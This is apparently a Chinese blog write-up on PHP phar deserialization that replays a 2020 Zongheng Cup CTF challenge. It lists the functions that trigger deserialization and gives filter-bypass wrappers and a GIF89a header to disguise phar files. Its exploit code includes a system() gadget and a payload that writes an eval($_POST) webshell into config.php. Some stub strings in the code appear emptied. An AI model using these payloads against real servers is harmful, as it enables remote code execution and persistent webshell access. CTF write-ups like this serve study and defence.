mysql 反序列化函数_phar反序列化

phar反序列化

前段时间纵横杯遇到一题反序列化，当时队友做出来了，赛后尝试复现一下，并总结反序列化内容

phar的本质是一种压缩文件，会以序列化的形式存储用户自定义的meta-data

Phar文件结构

stub：phar文件标识，以 __HALT_COMPILER();?>结尾

manifest：压缩文件的属性等信息，以序列化的形式存储自定义的meta-data

contents：压缩文件的内容

signature：签名，在文件末尾

测试

首先将php.ini中的phar.readonly置为Off，否则无法生成phar文件，而且这个参数是无法通过ini_set()进行修改的。

生成phar文件

class TestObject {

}

@unlink("phar.phar");

$phar = new Phar("phar.phar"); //后缀名必须为phar

$phar->startBuffering();

$phar->setStub(""); //设置stub

$o = new TestObject();

$o ->data = 'th1e';

$phar->setMetadata($o); //将自定义的meta-data存入manifest

$phar->addFromString("test.txt", "test"); //添加要压缩的文件

//签名自动计算

$phar->stopBuffering();

?>

打开文件可以看到，以序列化储存的文件

构造利用代码

class TestObject{

function __destruct(){

echo $this->data;

}

}

$filename = $_GET['filename'];

file_exists($filename);

?>

?filename=phar://phar.phar/test.txt

成功打印结果

php的文件系统函数在通过phar://伪协议解析phar文件时，都会将meta-data进行反序列化，知道创宇总结了以下函数

其实不止如此，只要调用了php_stream_open_wrapper的函数，都存在这样的问题，经测试，网上提供的如下函数也都可以：

exif

exif_thumbnail

exif_imagetype

gd

imageloadfont

imagecreatefrom

hash

hash_hmac_file

hash_file

hash_update_file

md5_file

sha1_file

file / url

get_meta_tags

get_headers

mime_content_type

standard

getimagesize

getimagesizefromstring

finfo

finfo_file

finfo_buffer

zip

$zip = new ZipArchive();

$res = $zip->open('c.zip');

$zip->extractTo('phar://test.phar/test');

Postgres

$pdo = new PDO(sprintf("pgsql:host=%s;dbname=%s;user=%s;password=%s", "127.0.0.1", "postgres", "sx", "123456"));

@$pdo->pgsqlCopyFromFile('aa', 'phar://test.phar/aa');

MySQL

LOAD DATA LOCAL INFILE`也会触发这个`php_stream_open_wrapper

class A {

public $s = '';

public function __wakeup () {

system($this->s);

}

}

$m = mysqli_init();

mysqli_options($m, MYSQLI_OPT_LOCAL_INFILE, true);

$s = mysqli_real_connect($m, 'localhost', 'root', '123456', 'easyweb', 3306);

$p = mysqli_query($m, 'LOAD DATA LOCAL INFILE \'phar://test.phar/test\' INTO TABLE a LINES TERMINATED BY \'\r\n\' IGNORE 1 LINES;');

再配置一下mysqld。(非默认配置)

[mysqld]

local-infile=1

secure_file_priv=""

Trick

过滤phar://协议的绕过方式

compress.bzip2://phar://

compress.zlib://phar:///

php://filter/resource=phar://

文件格式绕过

class TestObject {

}

@unlink("phar.phar");

$phar = new Phar("phar.phar");

$phar->startBuffering();

$phar->setStub("GIF89a".""); //设置stub，增加gif文件头

$o = new TestObject();

$phar->setMetadata($o); //将自定义meta-data存入manifest

$phar->addFromString("test.txt", "test"); //添加要压缩的文件

//签名自动计算

$phar->stopBuffering();

?>

增加了GIF89a文件头，从而使其伪装成gif文件

例子

2020纵横杯hello_php

文件泄漏下载

config.php

发现后台用户名密码登陆后台

登陆后发现上传接口

class.php

存在phar://反序列化漏洞

Payload

class Config{

public $title;

public $comment;

public $logo_url;

public function __construct(){

$this->title= 'th1e\';echo success;@eval($_POST['th1e']);?>';

}

}

$phar = new Phar("aaa.phar"); //后缀名必须为 phar

$phar->startBuffering();

$phar -> setStub('GIF89a'.'');

$object = new Config;

$phar->setMetadata($object); //将自定义的 meta-data 存入 manifest

$phar->addFromString("a.txt", "a"); //添加要压缩的文件

//签名自动计算

$phar->stopBuffering();

上传记录时间戳得到文件名

Index.php

发现函数file_exists

hello_php/index.php?img=phar://static/457b8d1367383f104cc8e3f8f3bf15d1.jpg/a.txt

此时在看config文件已经写入一句话

蚁剑连接

总结

PHP很多框架中文件操作函数使用频繁，Phar反序列的点很多，但随着PHP8的诞生，phar不再进行反序列化，以后phar反序列化也将逐渐淡出人们的视野。

Reference

https://blog.csdn.net/qq_42181428/article/details/100995404